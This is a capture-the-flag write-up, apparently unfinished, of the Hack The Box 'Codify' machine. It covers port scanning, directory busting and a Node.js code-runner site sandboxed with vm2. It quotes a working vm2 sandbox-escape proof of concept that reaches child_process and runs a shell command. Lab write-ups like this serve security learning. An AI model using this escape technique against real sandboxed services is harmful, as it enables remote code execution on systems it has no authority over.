Machine from Hack The Box:
nmap scan →
Of the 1,000 most common ports, port 22, 80, and 3000 are open. I haven’t ever seen 3000 as a listed port, going to disregard that for now and focus on 80.
22 → OpenSSH 8.9p1 Ubuntu
80 → Apache v2.4.52
<aside>
⚠️ Add the following line:
10.10.11.239 codify.htb
to /etc/hosts
</aside>
For Hack The Box machines, we might need to modify the /etc/hosts file and add an DNS entry. Sometimes this is needed to access web pages, so I do it for all Hack The Box machines.
The website is a Node.js code runner…wonder if it does input sanitization correctly?
can use the editor to run some basic Javascript
Furthermore, going to /about, they use the vm2 library to sandbox JS. What version they use could be helpful as there could be a vulnerability for it. They likely use v3.9.16
Googling “vm2 vulnerabilities” there seems to be a lot of Sandbox escape or bypass and RCE possible. However, diving into some proof of concept guides, they seem to use the child_process module which is disallowed by the codify software (check below).
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("echo hacked").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
Also located on /limitations is the exclusion of certain Node.js modules for security purposes.
listed modules that aren’t allowed to be executed. On the whitelist are the only modules that can be imported.
Here’s some Wappalyzer information as well to get a feel on the technologies behind the website’s backend:
Also let’s perform some directory busting to get more information on the website’s paths.
dirb <http://codify.htb>
Only 4 URLs are found with common.txt, the server-status path is also forbidden
After enumeration, my first thought is to try and perform some RCE using the module whitelist which contains the following JS modules: